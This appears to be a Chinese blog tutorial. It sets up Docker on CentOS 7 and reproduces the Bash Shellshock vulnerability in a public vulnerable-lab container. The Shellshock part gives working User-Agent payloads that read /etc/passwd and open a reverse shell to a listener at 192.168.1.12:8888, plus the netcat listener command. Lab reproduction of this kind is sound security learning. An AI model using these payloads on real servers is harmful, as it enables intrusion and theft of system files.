龙空技术网

「安全小实验」利用Docker快速搭建并复现bash_shellshock

白帽子讲安全 842

前言:

当前咱们对“centos7进入bash”大约比较关怀,姐妹们都想要了解一些“centos7进入bash”的相关内容。那么小编同时在网上网罗了一些关于“centos7进入bash””的相关文章,希望你们能喜欢,小伙伴们快快来了解一下吧!

上一篇讲了乌班图的docker安装,这次复现使用centos7,意图很明显啦,就是为了让大家都知道这两种linux。最后一个经典的bash漏洞复现。不说题外话啦,开始正文

1、centos7安装

centos7 自带安装

yum install docker

启动docker

Systemctl start docker

Systemctl status docker

开启的状态

2、镜像安装

注意:这里需要阿里的更新源,否则docker语句会出现错误

搜索镜像

Docker search centos7

获取镜像

Docker pull docker.io/centos (镜像名字)

3.进入容器与退出容器

docker run -t -i docker.io/centos /bin/bash

其中-t 选项让Docker分配一个伪终端(pseudo-tty)并绑定到容器的标准输入上, -i 则让容器的标准输入保持打开。

使用exit 可以退出容器.

查看有哪些容器

docker images

打包容器

docker save -o centos7.tar docker.io/centos

载入容器

docker load --input centos7.tar

查看进程中的镜像

Docker ps -a

终止镜像

Docker stop 263c082d8fd6

移除镜像

Docker rmi 263c082d8fd6

漏洞1 bash_shellshock

首先,问题起因于一个命令ENV。

原型:

env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...]

Man是这么说的:

Display, set, or remove environment variables,Run a command in a modified environment.

我的理解是使用env命令的key=value,首先会改变环境变量key,如果没有会临时创建,注意,这里是临时的改变环境变量。然后就把value后面的内容当做命令执行,类似于PHP中的eval。

利用方法

1、pull docker镜像,搭建环境

docker pull medicean/vulapps:b_bash_shellshock1

2、启动镜像

docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1

3、使用burp抓包,更改UA

() { :;};echo ; echo; echo $(/bin/cat /etc/passwd );

反弹shell

() { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/8888 0>&1;

Kali运行

nc -l -p 8888 -vvv

某云案例

具体链接就不发了,可自行搜索shellshock,有问题可关注发送留言哦~~~~~

标签: #centos7进入bash